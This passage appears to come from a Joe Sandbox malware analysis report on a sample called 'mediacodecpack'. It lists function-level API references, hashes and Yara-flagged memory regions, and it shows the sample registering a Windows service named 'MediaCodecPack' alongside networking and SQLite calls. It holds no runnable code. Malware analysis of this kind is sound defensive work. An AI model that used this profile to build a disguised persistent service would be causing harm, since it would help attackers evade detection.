                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                  • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                  • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                • String ID:
                                                                                • API String ID: 4038589952-0
                                                                                • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                APIs
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 247099642-0
                                                                                • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                APIs
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                • String ID:
                                                                                • API String ID: 326482775-0
                                                                                • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                APIs
                                                                                • CreateServiceA.ADVAPI32 ref: 00401CEA
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401DE8
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D9DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Create
                                                                                • String ID:
                                                                                • API String ID: 2095555506-0
                                                                                • Opcode ID: 4e24f678e77db617d62248852af96b5ef48e6e3678e00e895b71c32aaecc4b87
                                                                                • Instruction ID: 0fe43908b2f4f2b97dabd4b25638809676d0a1fd937f47625bea1c7d26ae5c5c
                                                                                • Opcode Fuzzy Hash: 4e24f678e77db617d62248852af96b5ef48e6e3678e00e895b71c32aaecc4b87
                                                                                • Instruction Fuzzy Hash: F3D092B0C48104EBCB142BE19E588693E35AB84311721047BE042B24A0CB79A84AEA6A
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D13B06,?,?,?,00000001), ref: 02D180ED
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D180F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: ae71e4da07445ffa421af250dd1b92345609446fbdb4314120a996ef8dc21339
                                                                                • Instruction ID: 71a9f677beba410c332d20c652407cb7ab012d0a2772747d0c2f6fcb25257817
                                                                                • Opcode Fuzzy Hash: ae71e4da07445ffa421af250dd1b92345609446fbdb4314120a996ef8dc21339
                                                                                • Instruction Fuzzy Hash: 2FB09231484208ABCB242B91FD19F683F28FB54692FE58810FA1E442508B6259349AD2
                                                                                APIs
                                                                                  • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1465156292-0
                                                                                • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 02D0E873
                                                                                  • Part of subcall function 02D0E6FA: _memmove.LIBCMT ref: 02D0E7B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove_memset
                                                                                • String ID:
                                                                                • API String ID: 3555123492-0
                                                                                • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction ID: cfcc74c391d3f7aebca6ad7c92dd31c972c048099b477b78b8a744ee0b6a3374
                                                                                • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction Fuzzy Hash: 05F082B190430DBAD700DF99D942B8DFBB8FF44310F208569D50CA7381E6B07A118B90
                                                                                APIs
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 00401DAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CtrlDispatcherServiceStart
                                                                                • String ID:
                                                                                • API String ID: 3789849863-0
                                                                                • Opcode ID: 481d2a331ace871461dda5285e7bc1a2b0e16cf770cc1648d6e887654da7be60
                                                                                • Instruction ID: 9e018714e0f28fb6a0f73ad3a544a0159f2dc19adf5a91f1fcc555a1f79ca4ff
                                                                                • Opcode Fuzzy Hash: 481d2a331ace871461dda5285e7bc1a2b0e16cf770cc1648d6e887654da7be60
                                                                                • Instruction Fuzzy Hash: 3ED05E35508529CFD790AB148D887E933B4BB0D782F1604A6944DF6191CB348B89DB2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                APIs
                                                                                • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                • sqlite3_free.SQLITE3 ref: 60926526
                                                                                • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                • sqlite3_free.SQLITE3 ref: 60926550
                                                                                  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                  • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                • sqlite3_free.SQLITE3 ref: 60926626
                                                                                • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                • sqlite3_free.SQLITE3 ref: 60926638
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                • sqlite3_free.SQLITE3 ref: 60926673
                                                                                • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                • API String ID: 937752868-2111127023
                                                                                • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D024E6
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D024FC
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D0250E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D0256D
                                                                                • SetLastError.KERNEL32(00000000,?,774CDFB0), ref: 02D0257F
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,774CDFB0), ref: 02D02599
                                                                                • GetLastError.KERNEL32(?,774CDFB0), ref: 02D025A2
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D025F0
                                                                                • InterlockedDecrement.KERNEL32(00000002), ref: 02D0262F
                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D0268E
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D02699
                                                                                • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D026AD
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,774CDFB0), ref: 02D026BD
                                                                                • GetLastError.KERNEL32(?,774CDFB0), ref: 02D026C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                • String ID:
                                                                                • API String ID: 1213838671-0
                                                                                • Opcode ID: 0b0c0cf65bb061002f6d44c8cb2e31f7fd12ba4b5d885f94706b0232a7342d7b
                                                                                • Instruction ID: dff9b6183bc6aa65bff3f720e794fef06058a3f5641881dde86967a5fb36ba7d
                                                                                • Opcode Fuzzy Hash: 0b0c0cf65bb061002f6d44c8cb2e31f7fd12ba4b5d885f94706b0232a7342d7b
                                                                                • Instruction Fuzzy Hash: 53611A71901209AFCB24DFA4D99CBAEBBB9FF08314F504529E956E7390D7309D44CBA0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04608
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                • htons.WS2_32(?), ref: 02D04669
                                                                                • htonl.WS2_32(?), ref: 02D0468C
                                                                                • htonl.WS2_32(00000000), ref: 02D04693
                                                                                • htons.WS2_32(00000000), ref: 02D04747
                                                                                • _sprintf.LIBCMT ref: 02D0475D
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                • htons.WS2_32(?), ref: 02D046B0
                                                                                  • Part of subcall function 02D0873B: __EH_prolog.LIBCMT ref: 02D08740
                                                                                  • Part of subcall function 02D0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D087BB
                                                                                  • Part of subcall function 02D0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D087D9
                                                                                  • Part of subcall function 02D01BA7: __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                  • Part of subcall function 02D0CEF7: __EH_prolog.LIBCMT ref: 02D0CEFC
                                                                                • htonl.WS2_32(?), ref: 02D0497C
                                                                                • htonl.WS2_32(00000000), ref: 02D04983
                                                                                • htonl.WS2_32(00000000), ref: 02D049C8
                                                                                • htonl.WS2_32(00000000), ref: 02D049CF
                                                                                • htons.WS2_32(?), ref: 02D049EF
                                                                                • htons.WS2_32(?), ref: 02D049F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                • String ID:
                                                                                • API String ID: 1645262487-0
                                                                                • Opcode ID: 65021610b7184e9c41869ba175bc7c4e934b8f44281269242a36bde8d7e80da2
                                                                                • Instruction ID: 023d0d5fa9813bfc097c8516f8c1fb8a79bd0d3b5cc585ec1f7c6bdce982102e
                                                                                • Opcode Fuzzy Hash: 65021610b7184e9c41869ba175bc7c4e934b8f44281269242a36bde8d7e80da2
                                                                                • Instruction Fuzzy Hash: A4022771C00259AEEF15DBA4D894BEEBBB9EF08304F10455AE505A72A0DB746E48CFA1
                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(MediaCodecPack,004019C8), ref: 00401A25
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401A84
                                                                                • GetLastError.KERNEL32 ref: 00401A86
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                • GetLastError.KERNEL32 ref: 00401AB4
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401AE4
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                • CloseHandle.KERNEL32 ref: 00401B05
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                • String ID: MediaCodecPack
                                                                                • API String ID: 3346042915-199385074
                                                                                • Opcode ID: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                • Instruction ID: 532dd47a677431e4b3997e11c6aba14a110aa56271c5c3b89ba5cdee744870bf
                                                                                • Opcode Fuzzy Hash: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                • Instruction Fuzzy Hash: D621B8B1501244ABD3206F16EF48E967FB8EB95B55B15403EE245B23B1CBF90444CBED
                                                                                APIs
                                                                                • RtlDecodePointer.NTDLL(?), ref: 02D16EF8
                                                                                • _free.LIBCMT ref: 02D16F11
                                                                                  • Part of subcall function 02D11F84: HeapFree.KERNEL32(00000000,00000000,?,02D14942,00000000,00000104,774D0A60), ref: 02D11F98
                                                                                  • Part of subcall function 02D11F84: GetLastError.KERNEL32(00000000,?,02D14942,00000000,00000104,774D0A60), ref: 02D11FAA
                                                                                • _free.LIBCMT ref: 02D16F24
                                                                                • _free.LIBCMT ref: 02D16F42
                                                                                • _free.LIBCMT ref: 02D16F54
                                                                                • _free.LIBCMT ref: 02D16F65
                                                                                • _free.LIBCMT ref: 02D16F70
                                                                                • _free.LIBCMT ref: 02D16F94
                                                                                • RtlEncodePointer.NTDLL(009D9730), ref: 02D16F9B
                                                                                • _free.LIBCMT ref: 02D16FB0
                                                                                • _free.LIBCMT ref: 02D16FC6
                                                                                • _free.LIBCMT ref: 02D16FEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 3064303923-0
                                                                                • Opcode ID: d27d9994bb5645342f1218c69158dc51355d44b2c0127796c418d437356bee96
                                                                                • Instruction ID: 254aad05d447c8ef12bb216d6a8e79f96e08c66221081a8303190b789242e96b
                                                                                • Opcode Fuzzy Hash: d27d9994bb5645342f1218c69158dc51355d44b2c0127796c418d437356bee96
                                                                                • Instruction Fuzzy Hash: F421A137E89211BFCB216F64F84064677A9EB04735729492EE90897780CB39DC64CFE0
                                                                                APIs
                                                                                  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                • sqlite3_free.SQLITE3 ref: 60960618
                                                                                • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
